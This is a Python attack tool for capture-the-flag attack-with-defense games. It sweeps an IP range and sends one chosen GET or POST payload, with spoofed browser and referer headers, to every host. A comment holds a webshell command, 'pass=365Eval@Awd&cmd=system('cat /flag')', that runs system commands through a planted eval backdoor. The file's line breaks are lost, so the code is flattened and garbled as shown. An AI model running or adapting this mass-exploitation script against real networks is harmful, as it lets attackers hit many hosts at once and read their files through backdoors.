#!/usr/bin/env python# encoding: utf-8from IPy import IPimport requestsimport sys# 批量Get_Flag# IP地址处理,调用方法IPs("192.168.10.0/24")或IPs("192.168.10.0-20"),返回一个数组def IPs(ip): IPS = [] s1 = "/" s2 = "-" if ip.find(s1) > 0: ip1 = IP(ip) for i in ip1: IPS.append(i) elif (str(ip).find(s2)) > 0: for i in range(int(str(ip)[str(ip).rfind('.') + 1:str(ip).rfind('-')]), int(str(ip)[str(ip).rfind('-') + 1:]) + 1): IPS.append(str(ip)[:str(ip).rfind('.') + 1] + str(i)) return IPSheaders = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Referer': 'https://www.baidu.com', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0 ', 'Cache-Control': 'no-cache'}# get请求def get_Requests(ip, payload): url = 'http://' + str(ip) + '/' + payload try: get_Flag = requests.get(url, headers=headers, timeout=3) return get_Flag.text except requests.exceptions.ConnectTimeout: return "Connect Timeout"# post请求def post_Requests(ip, payload, post_data): url = 'http://' + ip + '/' + payload temp1 = post_data.split('&') dist = {} for i in temp1: dist[i.split('=')[0]] = i.split('=')[1] print(dist) try: get_Flag = requests.post(url, headers=headers, data=dist, timeout=3) return get_Flag.text except requests.exceptions.ConnectTimeout: return "Connect Timeout"# 读取文件def open_file(file_name): data = [] for line in open(file_name): test = line.strip('\n') data.append(test) return data# 解析get数据包def get_Data(data): paload = data[0].split(' ')[1] return paload# pass=365Eval@Awd&cmd=system('cat /flag')# 解析post数据包def post_Data(data): paload = data[0].split(' ')[1] post = [] post.append(paload) post_data = data[len(data) - 1] post.append(post_data) return postdef cmd(): request_type = '' payload = '' post_data = '' filename = '' ip = '' if len(sys.argv) == 1: print("Instructions for use") print("python3 Game.py --type=get --ip=192.168.10.0/24 --pyload=test.php") print("python3 Game.py --type=post --ip=192.168.10.0/24 --pyload=test.php --data=username=sss&passwd=ddd") print("python3 Game.py --file=post.txt --ip=192.168.10.0/24 ") main() else: for i in sys.argv: if i.split('=')[0] == '--type': request_type = str(i.split('=')[1]) elif i.split('=')[0] == '--payload': payload = str(i.split('=')[1]) elif i.split('=')[0] == '--data': post_data = str(i.split('=')[1]) elif i.split('=')[0] == '--file': filename = str(i.split('=')[1]) elif i.split('=')[0] == '--ip': ip = i.split('=')[1] if len(request_type) != 0: if request_type.upper() == 'GET': for i in IPs(ip): print('[*]testing ' + i) print(get_Requests(i, payload)) elif request_type.upper() == 'POST': for i in IPs(ip): print('[*]testing ' + i) print(post_Requests(i, post_Data(post_data)[0], post_Data(post_data)[1])) else: data = open_file(filename) if data[0].split(' ')[0] == 'GET': for i in IPs(ip): print('[*]testing ' + i) print(get_Requests(i, get_Data(data))) elif data[0].split(' ')[0] == 'POST': for i in IPs(ip): print('[*]testing ' + i) print(post_Requests(i, post_Data(data)[0], post_Data(data)[1])) else: print('error')def main(): print('#get_Flag V2.0') ip = input('Please enter the IP range >>>') num = int(input('Please select request method 1 = get 2 = post 3 = auto>>>')) if num != 3: payload = input('Please enter the payload>>>') if num == 2: post_data = input('Please enter post_data>>>') for i in IPs(ip): print('[*]testing ' + i) print(post_Requests(i, payload, post_data)) else: for i in IPs(ip): print('[*]testing ' + i) print(get_Requests(i, payload)) else: filename = input('Please enter filename>>>') data = open_file(filename) if data[0].split(' ')[0] == 'GET': for i in IPs(ip): print('[*]testing ' + i) print(get_Requests(i, get_Data(data))) elif data[0].split(' ')[0] == 'POST': for i in IPs(ip): print('[*]testing ' + i) print(post_Requests(i, post_Data(data)[0], post_Data(data)[1])) else: print('error')if __name__ == '__main__': cmd()